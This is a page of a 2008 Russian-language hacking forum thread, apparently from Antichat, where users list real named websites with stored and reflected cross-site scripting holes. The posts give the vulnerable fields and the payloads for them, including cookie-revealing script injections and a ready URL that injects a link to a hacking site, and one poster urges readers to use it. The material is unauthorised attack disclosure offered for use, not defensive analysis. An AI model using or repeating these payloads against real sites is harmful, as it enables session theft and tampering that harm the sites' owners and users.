ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу Активные Xss
   
Ответ
Страница 18 из 41 « Первая < 8 14 15 16 17 18 19 20 21 22 28 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #171  
Старый 28.04.2008, 20:14
Travka
Новичок
Регистрация: 24.10.2006
Сообщений: 1
Провел на форуме:
17086

Репутация: 4
По умолчанию
http://memori.ru
регаемся
в поле имя или фамилия пишем
<script>alert()</script>
смотрим профиль
 
Ответить с цитированием

  #172  
Старый 28.04.2008, 20:20
xcedz
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141

Репутация: 3099


По умолчанию
www.33hochu.ru

Нашел вначале пассивную

Зарегался думаю может еще что есть интересненькое?

ГЫ, конечно есть, проходим несложную регистрацию, и в своем профайле создаем фотоальбом а в названии пишем наш код

например --></SCRIPT>">'></title><SCRIPT>alert(4)</SCRIPT>=&{</title><script>alert(5)</script>


можно так "><script>alert(document.cookie)</script>

еще можно раскрыть пути и пощупать на предмет (мусколь стопудова стоит) инжекции

http://www.33hochu.ru/antixy

вот что получилось ))
все, работает и в опере и в лисе
Последний раз редактировалось xcedz; 28.04.2008 в 20:44..
 
Ответить с цитированием

  #173  
Старый 05.05.2008, 19:02
echobyte
Moderator - Level 7
Регистрация: 07.03.2008
Сообщений: 568
Провел на форуме:
4140471

Репутация: 708


Отправить сообщение для echobyte с помощью ICQ
По умолчанию
www.pcweek.ru

уязвимы комментарии

пример http://www.pcweek.ru/themes/detail.php?ID=109663&THEME_ID=0&SPHERE_ID=?add-comment
 
Ответить с цитированием

  #174  
Старый 07.05.2008, 19:28
xcedz
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141

Репутация: 3099


По умолчанию
хытитипи ввв.stroyazbuka.com/web/registration.php

так вот. регестрируемся в каталоге. в поле регион можно внедрить свой код ))

так же есть и пассивная. (говорю тока о xss ))) есть и другие темы )
 
Ответить с цитированием

  #175  
Старый 11.05.2008, 11:08
YoYo Factory
Участник форума
Регистрация: 25.03.2008
Сообщений: 138
Провел на форуме:
1105166

Репутация: 201
Отправить сообщение для YoYo Factory с помощью ICQ
По умолчанию
/

Уязвима Регистрация
Ни одно поле не фильтруется

"><script>('XSS')</script>
Последний раз редактировалось YoYo Factory; 11.05.2008 в 11:11..
 
Ответить с цитированием

  #176  
Старый 13.05.2008, 11:42
N1K70
Banned
Регистрация: 02.01.2008
Сообщений: 195
Провел на форуме:
523549

Репутация: 301
Отправить сообщение для N1K70 с помощью ICQ
По умолчанию
хсс в модуле, после http://www.asapmachineco.com/index.php?module=ath&banner=> можно прописать любую команду... ну юзайте короче )))
Код:
http://www.asapmachineco.com/index.php?module=ath&banner=><a href=http://for-hack.ru>N1K70_SITE</a><script>alert(document.cookie)</script>
 
Ответить с цитированием

  #177  
Старый 13.05.2008, 15:53
ДеЦл
Banned
Регистрация: 07.05.2008
Сообщений: 33
Провел на форуме:
47655

Репутация: 35
Отправить сообщение для ДеЦл с помощью ICQ Отправить сообщение для ДеЦл с помощью AIM Отправить сообщение для ДеЦл с помощью MSN Отправить сообщение для ДеЦл с помощью Yahoo
По умолчанию
ИдиВЖопу.ру

Уязвимы поля "текст под картинкой" и "над картинкой"
Пример:

Цитата:
http://idi-v-zhopu.ru/?166
(с) Лигендо...
 
Ответить с цитированием

  #178  
Старый 13.05.2008, 19:41
xcedz
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141

Репутация: 3099


По умолчанию
Заводи ак создаем вакансию.

http://www.jobportal.com.ua/vacancy/499117.html

(портфолио разработчика http://www.globalweb.kiev.ua/portfolio/)
Последний раз редактировалось xcedz; 13.05.2008 в 20:03..
 
Ответить с цитированием

  #179  
Старый 18.05.2008, 13:58
М.Боярский
Banned
Регистрация: 05.05.2008
Сообщений: 28
Провел на форуме:
58118

Репутация: 50
Отправить сообщение для М.Боярский с помощью ICQ Отправить сообщение для М.Боярский с помощью AIM Отправить сообщение для М.Боярский с помощью MSN Отправить сообщение для М.Боярский с помощью Yahoo
По умолчанию
Kanalia.ru - сайт обо мне!
в каментах галлереи не фильтруеццо имя отправителя
http://kanalia.ru/gallery/
 
Ответить с цитированием

  #180  
Старый 23.05.2008, 00:05
echobyte
Moderator - Level 7
Регистрация: 07.03.2008
Сообщений: 568
Провел на форуме:
4140471

Репутация: 708


Отправить сообщение для echobyte с помощью ICQ
По умолчанию
 
Ответить с цитированием
Ответ
Страница 18 из 41 « Первая < 8 14 15 16 17 18 19 20 21 22 28 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Xss bx_N Forum for discussion of ANTICHAT 7 11.03.2007 19:17
mylivepage.ru активные XSS __XT__ Уязвимости 3 23.12.2006 14:31
Xss для новичков Micr0b Уязвимости 0 04.06.2006 18:25



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ